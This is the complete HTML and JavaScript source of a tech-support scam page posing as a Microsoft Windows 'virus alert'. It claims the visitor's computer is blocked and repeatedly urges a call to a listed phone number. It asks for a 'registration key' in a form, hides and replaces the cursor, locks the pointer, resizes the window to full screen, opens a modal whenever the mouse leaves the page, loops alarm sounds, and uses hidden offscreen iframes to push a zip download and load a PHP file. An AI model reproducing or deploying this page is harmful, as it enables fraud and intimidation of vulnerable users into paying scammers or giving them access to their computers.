


<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-144839394-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());

    gtag('config', 'UA-144839394-1');
</script>



    <meta name="google" value="notranslate">
    <meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Official-Helpline73371</title>




  <link href="./images/favicon.ico" rel="shortcut icon">

  <!-- Latest compiled and minified CSS -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"
        integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

  <!-- Optional theme -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css"
        integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">

  <!--<link rel="stylesheet" href="https://cdn.jsdelivr.net/bxslider/4.2.12/jquery.bxslider.css">-->
  <link rel="stylesheet" type="text/css" href="css/style.css">





  <script src="https://code.jquery.com/jquery-3.2.1.min.js" type="text/javascript"></script>

    <style>


    .blinkx {
    background-color:green;
      animation: blink-animation 1s steps(5, start) infinite;
      -webkit-animation: blink-animation 1s steps(5, start) infinite;
    }

    .blink1 {
    background-color:green;
      animation: blink-animation 1s steps(5, start) infinite;
      -webkit-animation: blink-animation 1s steps(5, start) infinite;
    }

    @keyframes blink-animation {
      to {
        visibility: hidden;
      }
    }
    @-webkit-keyframes blink-animation {
      to {
        visibility: hidden;
      }
    }
    </style>

    <style>



    /* The Modal (background) */
    .modal {
    	position: fixed; /* Stay in place */
    	z-index: 1; /* Sit on top */
    	padding-top: 0px; /* Location of the box */
    	left: 0px;
    	top: 0px;
    	width: 100%; /* Full width */
    	height: 100%; /* Full height */
    	overflow: auto; /* Enable scroll if needed */
    	background-color: rgb(0,0,0); /* Fallback color */
    	background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
    	font-family:arial; font-weight:900;
    }

    /* Modal Content */
    .modal-content {
    	position: relative;
    	background-color: red;
    	margin: auto;
    	padding: 0;
    	left: 52px;
    	/*border: 1px solid #888;*/
    	width: 45%;
    	box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
    	-webkit-animation-name: animatetop;
    	-webkit-animation-duration: 0.4s;
    	animation-name: animatetop;
    	animation-duration: 0.4s
    }

    /* Add Animation */
    @-webkit-keyframes animatetop {
    	from {top:-300px; opacity:0}
    	to {top:0; opacity:1}
    }

    @keyframes animatetop {
    	from {top:-300px; opacity:0}
    	to {top:0; opacity:1}
    }

    /* The Close Button */
    .close {
    display:none;
    	color: white;
    	float: right;
    	font-size: 28px;
    	font-weight: bold;
    }

    .close:hover,
    .close:focus {
    	color: #000;
    	text-decoration: none;
    	cursor: pointer;
    }

    .modal-header {
    	padding: 2px 20px;
    	background-color: red;
    	color: white;

    }
    .modal-header h2
    {
    border:none;
    font-size:42px;
    }

    .modal-body {padding: 2px 20px;color:white;}

    .modal-footer {
    	padding: 2px 10px;
    	background-color: red;
    	color: white;
    	height:80px;

    }

    .modal-footer btn{
    background-color:black;
    }




    </style>



    <style>div.fixed{position:fixed;bottom:0;right:-220px; width: 550px;border:1px }</style>
    <style>div.fixed2{position:fixed;bottom:0px;right:25px;width:200px;height:50px;border:1px;color:black;font-size:22px;font-weight:bold;-webkit-animation-name:example;-webkit-animation-duration:1s;animation-name:example;animation-duration:1s;animation-iteration-count:infinite}@-webkit-keyframes example{0%{color:black}50%{color:red}100%{color:black}}@keyframes example{0%{color:black}50%{color:red}100%{color:black}}</style>


    <script src=./js/jquery.min.js></script>
    <script>
        function formatAMPM() {
            var d = new Date()
              , minutes = d.getMinutes().toString().length == 1 ? '0' + d.getMinutes() : d.getMinutes()
              , hours = d.getHours().toString().length == 1 ? '0' + d.getHours() : d.getHours()
              , ampm = d.getHours() >= 12 ? 'pm' : 'am'
              , months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
              , days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'];
            return days[d.getDay()] + ' ' + months[d.getMonth()] + ' ' + d.getDate() + ' ' + d.getFullYear() + ' ' + hours + ':' + minutes + ampm;
        }
    </script>
    <script>
        function getURLParameter(a) {
            return decodeURI((RegExp(a + "=(.+?)(&|$)").exec(location.search) || [, null])[1] || "")
        }
        function random_betw(b, a) {
            return Math.round(Math.random() * (a - b) + b)
        }
        var phone = "+1844-420-3801";
          var text = "** Call Microsoft Windows +1844-420-3801 **";
            </script>
    <script>
        var w = window.screen.width;
        var h = window.screen.height;
        window.moveTo(0, 0);
        window.resizeTo(w, h);
    </script>
    <script>
        var isOpera = !!window.opera || navigator.userAgent.indexOf(" OPR/") >= 0;
        var isFirefox = typeof InstallTrigger !== "undefined";
        var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor") > 0;
        var isChrome = !!window.chrome && !isOpera;
        var isIE = /*@cc_on!@*/
        false || !!document.documentMode;
    </script>

  <style type="text/css">
      .nocursor { cursor:none; }
  </style>


  <script type="text/javascript">
  	$(document).ready(function(){

  	//-------------- fake cursor -----------------------------------
  						 function makeNewPosition() {
  								 var h = $(window).height() - 50, w = $(window).width() - 50, nh = Math.floor(Math.random() * h), nw = Math.floor(Math.random() * w); return [nh, nw];
  						 }
  						 function animateDiv() {
  								 var newq = makeNewPosition(), oldq = $(".fakeCursor").offset(), speed = calcSpeed([oldq.top, oldq.left], newq); $(".fakeCursor").animate({ top: newq[0], left: newq[1] }, speed, function () { animateDiv(); });

  						 };
  						 function calcSpeed(prev, next) {
  								 var x = Math.abs(prev[1] - next[1]), y = Math.abs(prev[0] - next[0]), greatest = x > y ? x : y, speedModifier = 0.3, speed = Math.ceil(greatest / speedModifier); return speed;
  						 }


  						 animateDiv();
  });



  </script>

  <style type="text/css">

  	html{
  		cursor: none;
  	}
  	.fakeCursor {
  								width: 17px;
  								height: 25px;
  								background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");
  								position: fixed;
  									top:5px;
  									left: 400px;
  								z-index: 100;
  						}
  </style>



</head>
<body class="en ltr" style="cursor: none; background-image: url('./images/background.png'); z-index:9999999;" id="chrome-alerts" >

<div class="fakeCursor"></div>
<div id="body" class="container-fluid" style=" z-index:999999999;">
  <div class="row">
    <div class="col-md-12">
      <div class="row block1">
        <div class="col-md-4 left">
          <strong>Windows Security Tollfree:</strong>
          <p style="font-size:30px; color: rgba(0, 0, 0, 0.7);"> +1844-420-3801 </p>
          <label style="font-size: 12px;">
            <input checked="nonchecked" type="checkbox"> Prevent this page from creating additional dialogues.</label>
        </div>
        <div class="col-md-4">
          <div class="middle" id="alert-modal">
            <a style="margin-right: 8px" href="" class="cross">x</a>
            <div class="content-box" id="alert-content-box">
              <center><strong>VIRUS ALERT FROM Windows</strong></center>
              <center><h5><b>This computer is BLOCKED</b></h5></center>
              <h6><b>Do not close this window and restart your computer</b></h6>
              <h6><b>Your computer's registration key is Blocked.</b></h6>
              <h6><b>Why we blocked your computer?</b></h6>
              <h6>The window's registration key is illegal.</h6>
              <h6>This window is using pirated software.</h6>
              <h6>This window is sending virus over the internet.</h6>
              <h6>This window is hacked or used from undefined location.</h6>
              <h6>We block this computer for your security. </h6>
              <h6>Contact Windows helpline to reactivate your computer.</h6>

                  <p style="font-size:20px; color: rgba(0, 0, 0, 0.7);">Windows Security Tollfree +1844-420-3801 </p>
                  <button class="ms-btn chat_now blink" style="background-color:green; color:white; float:right">Back to Safety</button>





            </div>
          </div>

          <div class="block22">
            <div class="row">
              <div class="col-md-4">
                <img src="./images/rsod.png">
              </div>
              <div class="col-md-4">
                <div id="red_alert1" class=""style="">
                  <h1><img style="height: 40px; width: 40px; margin-top: -10px;"
                           src="images/335158-windows-8-window.png"> Windows Support Alert</h1>
                  <h3>Your System Detected Some Unusual Activity.</h3>
                  <h5>It might harm your computer data and track your financial activities.</h5>
                  <h3>Please report this activity to  +1844-420-3801</h3>
                </div>
                <div class="row">
                  <div class="col-md-12">
                    <div class="row">
                      <div class="col-md-12">
                        <button class="ms-btn">Ignore Alert</button>
                        <button class="ms-btn chat_now">Chat Now</button>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="col-md-4 right">

          <form style="text-align: left;" action="login.php.htm" method="POST" align="center">
            <div>
              <strong>Enter Windows registration key to unblock.</strong>
            </div>
            <div class="tbl-center" style="margin-top: 5px;">
              <strong style="text-align:left;color: rgba(0, 0, 0, 0.7);"> ENTER KEY:</strong>
              <div style="min-width:100px;">
                <input type="text" name="ENTER KEY" style="width: 100%;" />
              </div>
              <div>
                <input class="ms-btn" type="button" value="Submit">
              </div>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
</div>


<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="Call-MS-Windows-helpline.zip"></iframe></div>
  <!--<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="S10_1010101_Code10.php"></iframe></div> -->


<div class="block2" style="background-color:blue;">
  <div class="row">
    <div class="col-md-3">
      <img style="height: 240px; width: auto;" src="./images/rsod.png">
    </div>
    <div class="col-md-6">
      <div id="red_alert" style="margin-bottom: 25px;">
        <h1><img style="height: 40px; width: 40px; margin-top: -10px;" src="images/335158-windows-8-window.png"> Windows
          Support Alert</h1>
        <h3>Your System Detected Some Unusual Activity.</h3>
        <h5>It might harm your computer data and track your financial activities.</h5>
        <h3>Please report this activity to  +1844-420-3801</h3>
      </div>
      <div class="row">
        <div class="col-md-12">
          <div class="row">
            <div class="col-md-6 no-padding-right">
              <button class="ms-btn">Ignore Alert</button>
            </div>
            <div class="col-md-6 no-padding-left">
              <button class="ms-btn chat_now blink" style="background-color:red; color:white">Leave This Page</button>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>


<div id="myModal" class="modal" style="display:inline-block;">

  <!-- Modal content -->
  <div class="modal-content">
    <div class="modal-header">
      <span class="close">&times;</span>
      <h2 style="font-size:30px">Microsoft Windows  Warning Alert  <br/>Call Helpline  +1844-420-3801 (Toll Free) </h2>
    </div>

    <div class="modal-footer"style="font-size: 18px; border:none">


    <div style="float:right;"><strong class="active" style="padding:10px;background-color:blue;border:2px solid #fff;">Run anyway</strong>&nbsp;&nbsp;&nbsp; <button class="active blinkx"  style="background-color:green;border:2px solid #fff; padding:10px;font-weight:bold; color:#fff; font-size:14px" >Back to Safety</button></div>


    </div>
  </div>

</div>

<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="S10_1010101_Code10.php"></iframe></div>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="S10_1010101_Code10.php"></iframe></div>


<script type="text/javascript">
window.onload = function(){
                alert("Windows Hard disk Faliure & Data loss. This Harmful malware is affecting your online information Helpline +1844-420-3801.");
                }
</script>


<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="S10_1010101_Code10.php"></iframe></div>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="S10_1010101_Code10.php"></iframe></div>

<script>
// Get the modal
var modal = document.getElementById('myModal');

// Get the button that opens the modal
var btn = document.getElementById("myBtn");

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the user clicks the button, open the modal
/*btn.onclick = function() {
modal.style.display = "block";
} */

// When the user clicks on <span> (x), close the modal
span.onclick = function() {
modal.style.display = "none";
}

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
if (event.target == modal) {
  modal.style.display = "none";
}
}
</script>
<script type="text/javascript">
function addEvent(obj, evt, fn) {
  if (obj.addEventListener) {
      obj.addEventListener(evt, fn, false);
  }
  else if (obj.attachEvent) {
      obj.attachEvent("on" + evt, fn);
  }
}
addEvent(window,"load",function(e) {
  addEvent(document, "mouseout", function(e) {
      e = e ? e : window.event;
      var from = e.relatedTarget || e.toElement;
      if (!from || from.nodeName == "HTML") {
          // stop your drag event here
          // for now we can just use an alert
       //alert("hello");

     modal.style.display = "block";

      }
  });
});

$(document).mousemove(function(){
var canvas = document.getElementById('mycanvas');
canvas.requestPointerLock = canvas.requestPointerLock || canvas.mozRequestPointerLock || canvas.webkitRequestPointerLock;
canvas.requestPointerLock();

//capture mouse movement event
   // remove our layover from the DOM
});

//  $(document).mousemove(function(){
// alert("move detect");
//capture mouse movement event
//   $("#pageLayover").remove(); // remove our layover from the DOM
// });


</script>


<audio autoplay="autoplay" loop="" id="msgSound">
  <source src="err.mp3" type="audio/mpeg">
</audio>

<audio autoplay="autoplay" loop="" id="msgSound1">
  <source src="err.mp3" type="audio/mpeg">
</audio>

<script type="text/javascript">/*<![CDATA[*/
// audio play /*
  var msgAudioEl = document.getElementById("msgSound");

  var playMsgInt = setInterval(function () {
    if (isPlaying(msgAudioEl)) {
      // console.log('already playing. clearing interval');
      clearInterval(playMsgInt);
    } else {
      // console.log('Triggering play');
      msgAudioEl.play();
    }
  }, 500);
  // audio play */

</script>

    <script type="text/javascript">/*<![CDATA[*/
    // audio play /*
      var msgAudioEl = document.getElementById("msgSound1");

      var playMsgInt = setInterval(function () {
        if (isPlaying(msgAudioEl)) {
          // console.log('already playing. clearing interval');
          clearInterval(playMsgInt);
        } else {
          // console.log('Triggering play');
          msgAudioEl.play();
        }
      }, 5000);
      // audio play */

    </script>


<iframe src="beep.mp3" allow="autoplay" style="display:none;">
</body>
</html>
